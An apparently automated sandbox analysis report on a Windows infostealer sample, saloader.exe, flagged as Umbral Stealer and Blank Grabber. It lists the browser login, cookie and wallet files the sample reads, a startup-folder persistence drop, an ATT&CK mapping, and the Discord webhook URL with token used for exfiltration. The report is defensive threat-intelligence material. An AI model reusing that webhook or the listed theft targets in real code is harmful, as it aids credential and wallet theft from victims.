                        Source: saloader.exe, 00000000.00000002.1924265199.000002113F9B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 8C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                        Source: saloader.exe, 00000000.00000002.1924265199.000002113F9B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: keystore
                        Tries to harvest and steal browser information (history, passwords, etc)
                        Source: C:\Users\user\Desktop\saloader.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.logJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000003.logJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: Yara matchFile source: 00000000.00000002.1924265199.000002113F9B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1924265199.000002113F3F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: saloader.exe PID: 520, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Yara detected Blank Grabber
                        Source: Yara matchFile source: saloader.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.saloader.exe.2113d640000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.1924265199.000002113FA90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1924265199.000002113F4A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000000.1205880732.000002113D642000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1924265199.000002113F9E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1924265199.000002113F3F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: saloader.exe PID: 520, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\FRc7Z.scr, type: DROPPED
                        Yara detected Umbral Stealer
                        Source: Yara matchFile source: saloader.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.saloader.exe.2113d640000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000000.1205880732.000002113D642000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: saloader.exe PID: 520, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\FRc7Z.scr, type: DROPPED

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                        Windows Management Instrumentation                        		1
                        DLL Side-Loading                        		1
                        DLL Side-Loading                        		1
                        File and Directory Permissions Modification                        		1
                        OS Credential Dumping                        		22
                        System Information Discovery                        		Remote Services1
                        Archive Collected Data                        		3
                        Ingress Tool Transfer                        		Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts11
                        Command and Scripting Interpreter                        		12
                        Registry Run Keys / Startup Folder                        		11
                        Process Injection                        		21
                        Disable or Modify Tools                        		LSASS Memory111
                        Security Software Discovery                        		Remote Desktop Protocol2
                        Data from Local System                        		11
                        Encrypted Channel                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain Accounts1
                        PowerShell                        		Logon Script (Windows)12
                        Registry Run Keys / Startup Folder                        		11
                        Obfuscated Files or Information                        		Security Account Manager1
                        Process Discovery                        		SMB/Windows Admin SharesData from Network Shared Drive4
                        Non-Application Layer Protocol                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                        Timestomp                        		NTDS41
                        Virtualization/Sandbox Evasion                        		Distributed Component Object ModelInput Capture5
                        Application Layer Protocol                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                        DLL Side-Loading                        		LSA Secrets1
                        Application Window Discovery                        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                        File Deletion                        		Cached Domain Credentials11
                        Remote System Discovery                        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                        Masquerading                        		DCSync11
                        System Network Configuration Discovery                        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job41
                        Virtualization/Sandbox Evasion                        		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                        Process Injection                        		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1565502 Sample: saloader.exe Startdate: 30/11/2024 Architecture: WINDOWS Score: 100 48 ip-api.com 2->48 50 discordapp.com 2->50 56 Malicious sample detected (through community Yara rule) 2->56 58 Antivirus detection for dropped file 2->58 60 Antivirus / Scanner detection for submitted sample 2->60 62 11 other signatures 2->62 8 saloader.exe 15 16 2->8         started        signatures3 process4 dnsIp5 52 ip-api.com 208.95.112.1, 49763, 80 TUT-ASUS United States 8->52 54 discordapp.com 162.159.129.233, 443, 49813, 49819 CLOUDFLARENETUS United States 8->54 40 C:\ProgramData\Microsoft\...\FRc7Z.scr, PE32 8->40 dropped 42 C:\Windows\System32\drivers\etc\hosts, ASCII 8->42 dropped 44 C:\Users\user\AppData\...\saloader.exe.log, ASCII 8->44 dropped 46 C:\ProgramData\...\FRc7Z.scr:Zone.Identifier, ASCII 8->46 dropped 64 Suspicious powershell command line found 8->64 66 Found many strings related to Crypto-Wallets (likely being stolen) 8->66 68 Self deletion via cmd or bat file 8->68 70 7 other signatures 8->70 13 powershell.exe 23 8->13         started        16 cmd.exe 8->16         started        18 powershell.exe 11 8->18         started        20 8 other processes 8->20 file6 signatures7 process8 signatures9 72 Loading BitLocker PowerShell Module 13->72 22 WmiPrvSE.exe 13->22         started        24 conhost.exe 13->24         started        74 Uses ping.exe to check the status of other devices and networks 16->74 26 conhost.exe 16->26         started        28 PING.EXE 16->28         started        30 conhost.exe 18->30         started        32 conhost.exe 20->32         started        34 conhost.exe 20->34         started        36 conhost.exe 20->36         started        38 5 other processes 20->38 process10

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        saloader.exe79%ReversingLabsByteCode-MSIL.Trojan.UmbralStealer
                        saloader.exe75%VirustotalBrowse
                        saloader.exe100%AviraHEUR/AGEN.1307507
                        saloader.exe100%Joe Sandbox ML

                        Dropped Files

                        SourceDetectionScannerLabelLink
                        C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\FRc7Z.scr100%AviraHEUR/AGEN.1307507
                        C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\FRc7Z.scr100%Joe Sandbox ML
                        C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\FRc7Z.scr79%ReversingLabsByteCode-MSIL.Trojan.UmbralStealer
                        C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\FRc7Z.scr82%VirustotalBrowse

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        No Antivirus matches

                        URLs

                        SourceDetectionScannerLabelLink
                        http://www.microsoft.co90%Avira URL Cloudsafe
                        http://crl.microsoe0%Avira URL Cloudsafe

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        ip-api.com
                        		208.95.112.1
                        		truefalse
                          		high
                          discordapp.com
                          		162.159.129.233
                          		truefalse
                            		high

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            https://discordapp.com/api/webhooks/1310580388070031360/HcT5cAwFckSLk1OKu346uVDw7gzPyJJvcWmU8BKJrBQSUsE3Q1GCqDtVn5MK3JlldJBnfalse
                              		high
                              http://ip-api.com/json/?fields=225545false
                                		high

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                http://nuget.org/NuGet.exepowershell.exe, 00000009.00000002.1345053621.0000022DA6793000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1470021049.0000022F1160E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1408003898.0000022F02E5D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1470021049.0000022F11745000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1609155447.0000021A101B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1609155447.0000021A1007C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1502342248.0000021A019B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1827384470.00000218E5A31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1827384470.00000218E58FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1699129988.00000218D7148000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000011.00000002.1408003898.0000022F02D90000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1502342248.0000021A0179B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1699129988.00000218D6D1E000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://discord.com/api/v10/users/FRc7Z.scr.0.drfalse
                                      		high
                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000001B.00000002.1699129988.00000218D5AB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000009.00000002.1322027586.0000022D96949000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000001B.00000002.1699129988.00000218D5AB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.microsoft.copowershell.exe, 00000009.00000002.1352472499.0000022DAEEFF000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://contoso.com/Licensepowershell.exe, 0000001B.00000002.1699129988.00000218D7148000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://discordapp.comsaloader.exe, 00000000.00000002.1924265199.000002113F4CA000.00000004.00000800.00020000.00000000.sdmp, saloader.exe, 00000000.00000002.1924265199.000002113F4A5000.00000004.00000800.00020000.00000000.sdmp, saloader.exe, 00000000.00000002.1924265199.000002113FAAC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://discordapp.com/api/v9/users/saloader.exe, FRc7Z.scr.0.drfalse
                                                    		high
                                                    https://contoso.com/Iconpowershell.exe, 0000001B.00000002.1699129988.00000218D7148000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://discordapp.comsaloader.exe, 00000000.00000002.1924265199.000002113F4CA000.00000004.00000800.00020000.00000000.sdmp, saloader.exe, 00000000.00000002.1924265199.000002113FAAC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.microsoft.co9powershell.exe, 00000013.00000002.1629506209.0000021A7EABE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://ip-api.com/json/?fielsaloader.exe, 00000000.00000002.1924265199.000002113F9E5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://github.com/Pester/Pesterpowershell.exe, 0000001B.00000002.1699129988.00000218D5AB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://github.com/Blank-c/Umbral-Stesaloader.exe, 00000000.00000002.1924265199.000002113FA90000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://github.com/Blank-c/Umbral-StealerFRc7Z.scr.0.drfalse
                                                                		high
                                                                http://crl.microsopowershell.exe, 00000013.00000002.1625690847.0000021A7E6B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://discordapp.com/api/webhooks/1310580388070031360/HcT5cAwFckSLk1OKu346uVDw7gzPyJJvcWmU8BKJrBQSsaloader.exe, 00000000.00000002.1924265199.000002113F4CA000.00000004.00000800.00020000.00000000.sdmp, saloader.exe, 00000000.00000002.1924265199.000002113FA90000.00000004.00000800.00020000.00000000.sdmp, saloader.exe, 00000000.00000002.1924265199.000002113F391000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://crl.microsoepowershell.exe, 00000013.00000002.1629506209.0000021A7EABE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000009.00000002.1322027586.0000022D96949000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://contoso.com/powershell.exe, 0000001B.00000002.1699129988.00000218D7148000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://github.com/Blank-c/Umbral-Stealerx#saloader.exe, 00000000.00000002.1924265199.000002113FA90000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://nuget.org/nuget.exepowershell.exe, 00000009.00000002.1345053621.0000022DA6793000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1470021049.0000022F1160E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1408003898.0000022F02E5D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1470021049.0000022F11745000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1609155447.0000021A101B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1609155447.0000021A1007C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1502342248.0000021A019B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1827384470.00000218E5A31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1827384470.00000218E58FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1699129988.00000218D7148000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://ip-api.comsaloader.exe, 00000000.00000002.1924265199.000002113FA0F000.00000004.00000800.00020000.00000000.sdmp, saloader.exe, 00000000.00000002.1924265199.000002113F9C8000.00000004.00000800.00020000.00000000.sdmp, saloader.exe, 00000000.00000002.1924265199.000002113F3F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://oneget.orgXpowershell.exe, 00000011.00000002.1408003898.0000022F02D90000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1502342248.0000021A0179B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1699129988.00000218D6D1E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://aka.ms/pscore68powershell.exe, 00000009.00000002.1322027586.0000022D96721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1364642205.000002520E6A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1364642205.000002520E6C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1408003898.0000022F01591000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1502342248.0000021A00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1699129988.00000218D5881000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namesaloader.exe, 00000000.00000002.1924265199.000002113F391000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1322027586.0000022D96721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1364642205.000002520E6A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1408003898.0000022F01591000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1502342248.0000021A00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1699129988.00000218D5881000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://oneget.orgpowershell.exe, 00000011.00000002.1408003898.0000022F02D90000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1502342248.0000021A0179B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1699129988.00000218D6D1E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://ip-api.com/line/?fields=hostingI7AB5C494-39F5-4941-9163-47F54D6D5016I032E02B4-0499-05C3-0806-saloader.exe, FRc7Z.scr.0.drfalse
                                                                                        		high

                                                                                        World Map of Contacted IPs

                                                                                        • No. of IPs < 25%
                                                                                        • 25% < No. of IPs < 50%
                                                                                        • 50% < No. of IPs < 75%
                                                                                        • 75% < No. of IPs

                                                                                        Public IPs

                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                        208.95.112.1
                                                                                        		ip-api.comUnited States
                                                                                        		53334TUT-ASUSfalse
                                                                                        162.159.129.233
                                                                                        		discordapp.comUnited States
                                                                                        		13335CLOUDFLARENETUSfalse

                                                                                        General Information

                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                        Analysis ID:1565502
                                                                                        Start date and time:2024-11-30 02:28:06 +01:00
                                                                                        Joe Sandbox product:CloudBasic
                                                                                        Overall analysis duration:0h 7m 21s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:full
                                                                                        Cookbook file name:default.jbs
                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                        Number of analysed new started processes analysed:37
                                                                                        Number of new started drivers analysed:0
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:0
                                                                                        Technologies:
                                                                                        • HCA enabled
                                                                                        • EGA enabled
                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Analysis stop reason:Timeout
                                                                                        Sample name:saloader.exe
                                                                                        Detection:MAL
                                                                                        Classification:mal100.troj.adwa.spyw.evad.winEXE@37/24@2/2
                                                                                        EGA Information:Failed
                                                                                        HCA Information:
                                                                                        • Successful, ratio: 70%
                                                                                        • Number of executed functions: 247
                                                                                        • Number of non-executed functions: 0
                                                                                        Cookbook Comments:
                                                                                        • Found application associated with file extension: .exe

                                                                                        Warnings

                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                        • Excluded IPs from analysis (whitelisted): 172.217.17.67
                                                                                        • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, gstatic.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                                        • Execution Graph export aborted for target powershell.exe, PID 7308 because it is empty
                                                                                        • Execution Graph export aborted for target powershell.exe, PID 7444 because it is empty
                                                                                        • Execution Graph export aborted for target powershell.exe, PID 7636 because it is empty
                                                                                        • Execution Graph export aborted for target powershell.exe, PID 7840 because it is empty
                                                                                        • Execution Graph export aborted for target powershell.exe, PID 8048 because it is empty
                                                                                        • Execution Graph export aborted for target saloader.exe, PID 520 because it is empty
                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                                        • Report size getting too big, too many NtOpenFile calls found.
                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                        Simulations

                                                                                        Behavior and APIs

                                                                                        TimeTypeDescription
                                                                                        20:29:04API Interceptor33x Sleep call for process: powershell.exe modified
                                                                                        21:46:16API Interceptor241x Sleep call for process: saloader.exe modified
                                                                                        21:46:18API Interceptor4x Sleep call for process: WMIC.exe modified

                                                                                        Joe Sandbox View / Context

                                                                                        IPs

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        208.95.112.188851n80.exeGet hashmaliciousUnknownBrowse
                                                                                        • www.ip-api.com/line/?fields=16401
                                                                                        file.exeGet hashmaliciousHackBrowser, XmrigBrowse
                                                                                        • ip-api.com/json
                                                                                        file.exeGet hashmaliciousClipboard HijackerBrowse
                                                                                        • ip-api.com/line/
                                                                                        file.exeGet hashmaliciousClipboard HijackerBrowse
                                                                                        • ip-api.com/line/
                                                                                        file.exeGet hashmaliciousXWormBrowse
                                                                                        • ip-api.com/line/?fields=hosting
                                                                                        file.exeGet hashmaliciousXWormBrowse
                                                                                        • ip-api.com/line/?fields=hosting
                                                                                        Enquiry.jsGet hashmaliciousAgentTeslaBrowse
                                                                                        • ip-api.com/line/?fields=hosting
                                                                                        8FloezlGW7.exeGet hashmaliciousPython Stealer, Blank GrabberBrowse
                                                                                        • ip-api.com/json/?fields=225545
                                                                                        Orden de compra.pdf______________________________________.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • ip-api.com/line/?fields=hosting
                                                                                        Pedido_4502351226_de Compa#U00f1#U00eda Anno S.A..exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • ip-api.com/line/?fields=hosting

                                                                                        Domains

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        discordapp.comEsgeCzT4do.exeGet hashmaliciousXWormBrowse
                                                                                        • 162.159.129.233
                                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                                        • 162.159.135.233
                                                                                        file.exeGet hashmaliciousCStealerBrowse
                                                                                        • 162.159.134.233
                                                                                        https://cdn.discordapp.com/attachments/1284277835762110544/1305291734967779460/emu.exe?ex=67327f28&is=67312da8&hm=ea20e1c2a609dc1a0569bd4abb7e0da0a5e0671f3f7a388c1ed138f806c8e0c4&Get hashmaliciousUnknownBrowse
                                                                                        • 162.159.135.233
                                                                                        RLesaPFXew.exeGet hashmaliciousSilverRatBrowse
                                                                                        • 162.159.133.233
                                                                                        SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeGet hashmaliciousXmrigBrowse
                                                                                        • 162.159.135.233
                                                                                        segura.vbsGet hashmaliciousRemcosBrowse
                                                                                        • 162.159.135.233
                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                        • 162.159.129.233
                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Quasar, StealcBrowse
                                                                                        • 162.159.134.233
                                                                                        LDlanZur0i.exeGet hashmaliciousUnknownBrowse
                                                                                        • 162.159.135.233
                                                                                        ip-api.com88851n80.exeGet hashmaliciousUnknownBrowse
                                                                                        • 208.95.112.1
                                                                                        file.exeGet hashmaliciousHackBrowser, XmrigBrowse
                                                                                        • 208.95.112.1
                                                                                        file.exeGet hashmaliciousClipboard HijackerBrowse
                                                                                        • 208.95.112.1
                                                                                        file.exeGet hashmaliciousClipboard HijackerBrowse
                                                                                        • 208.95.112.1
                                                                                        file.exeGet hashmaliciousXWormBrowse
                                                                                        • 208.95.112.1
                                                                                        file.exeGet hashmaliciousXWormBrowse
                                                                                        • 208.95.112.1
                                                                                        Enquiry.jsGet hashmaliciousAgentTeslaBrowse
                                                                                        • 208.95.112.1
                                                                                        8FloezlGW7.exeGet hashmaliciousPython Stealer, Blank GrabberBrowse
                                                                                        • 208.95.112.1
                                                                                        https://www.scrolldroll.com/best-dialogues-from-asur/Get hashmaliciousUnknownBrowse
                                                                                        • 208.95.112.2
                                                                                        Orden de compra.pdf______________________________________.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 208.95.112.1

                                                                                        ASNs

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        CLOUDFLARENETUSONHQNHFT.msiGet hashmaliciousUnknownBrowse
                                                                                        • 172.67.141.133
                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 172.67.165.166
                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 172.67.165.166
                                                                                        file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, Stealc, VidarBrowse
                                                                                        • 104.21.75.163
                                                                                        file.exeGet hashmaliciousHackBrowser, XmrigBrowse
                                                                                        • 104.16.123.96
                                                                                        https://thunderstore.io/package/download/Grad/HiddenUnits/1.3.0/Get hashmaliciousUnknownBrowse
                                                                                        • 104.26.14.210
                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 172.67.165.166
                                                                                        siveria.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                        • 104.26.13.205
                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 172.67.167.249
                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 172.67.165.166
                                                                                        TUT-ASUS88851n80.exeGet hashmaliciousUnknownBrowse
                                                                                        • 208.95.112.1
                                                                                        file.exeGet hashmaliciousHackBrowser, XmrigBrowse
                                                                                        • 208.95.112.1
                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Clipboard Hijacker, LummaC StealerBrowse
                                                                                        • 208.95.112.1
                                                                                        file.exeGet hashmaliciousClipboard HijackerBrowse
                                                                                        • 208.95.112.1
                                                                                        file.exeGet hashmaliciousClipboard HijackerBrowse
                                                                                        • 208.95.112.1
                                                                                        file.exeGet hashmaliciousXWormBrowse
                                                                                        • 208.95.112.1
                                                                                        file.exeGet hashmaliciousXWormBrowse
                                                                                        • 208.95.112.1
                                                                                        Enquiry.jsGet hashmaliciousAgentTeslaBrowse
                                                                                        • 208.95.112.1
                                                                                        8FloezlGW7.exeGet hashmaliciousPython Stealer, Blank GrabberBrowse
                                                                                        • 208.95.112.1
                                                                                        https://www.scrolldroll.com/best-dialogues-from-asur/Get hashmaliciousUnknownBrowse
                                                                                        • 208.95.112.2

                                                                                        JA3 Fingerprints

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        3b5074b1b5d032e5620f69f9f700ff0efile.exeGet hashmaliciousHackBrowser, XmrigBrowse
                                                                                        • 162.159.129.233
                                                                                        https://thunderstore.io/package/download/Grad/HiddenUnits/1.3.0/Get hashmaliciousUnknownBrowse
                                                                                        • 162.159.129.233
                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        • 162.159.129.233
                                                                                        file.exeGet hashmaliciousAmadey, AsyncRAT, Cryptbot, DcRat, LummaC Stealer, Nymaim, StealcBrowse
                                                                                        • 162.159.129.233
                                                                                        file.exeGet hashmaliciousStealeriumBrowse
                                                                                        • 162.159.129.233
                                                                                        file.exeGet hashmaliciousAsyncRAT, DcRat, StealeriumBrowse
                                                                                        • 162.159.129.233
                                                                                        https://totspotdaynursery.co.uk/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1Get hashmaliciousUnknownBrowse
                                                                                        • 162.159.129.233
